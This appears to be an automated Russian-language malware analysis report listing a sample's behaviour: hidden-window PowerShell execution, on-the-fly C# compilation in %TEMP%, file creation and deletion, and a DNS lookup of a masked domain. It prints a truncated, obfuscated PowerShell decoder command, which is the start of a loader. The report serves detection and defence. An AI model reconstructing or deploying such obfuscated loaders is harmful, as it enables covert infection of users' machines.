Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function wb7e45 {param($q23c5ce)$kd385b2='l4a3b26';$mf33ab5='';for ($i=0; $i -lt $q23c5ce.length;$i+=2){$d2e9b=[convert]::ToByte($q23c5ce.Substring($i,2),16);$mf33ab5+=[ch...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\znk3gwgx.0.cs
- %TEMP%\znk3gwgx.cmdline
- %TEMP%\znk3gwgx.out
- %TEMP%\csc5749.tmp
- %TEMP%\res575a.tmp
- %TEMP%\znk3gwgx.dll
Удаляет следующие файлы
- %TEMP%\res575a.tmp
- %TEMP%\csc5749.tmp
- %TEMP%\znk3gwgx.dll
- %TEMP%\znk3gwgx.cmdline
- %TEMP%\znk3gwgx.out
- %TEMP%\znk3gwgx.pdb
- %TEMP%\znk3gwgx.0.cs
Сетевая активность
UDP
- DNS ASK il####etwo.co.uk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function wb7e45 {param($q23c5ce)$kd385b2='l4a3b26';$mf33ab5='';for ($i=0; $i -lt $q23c5ce.length;$i+=2){$d2e9b=[convert]::ToByte($q23c5ce.Substring($i,2),16);$mf33ab5+=[ch...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\znk3gwgx.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES575A.tmp" "%TEMP%\CSC5749.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\znk3gwgx.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES575A.tmp" "%TEMP%\CSC5749.tmp"
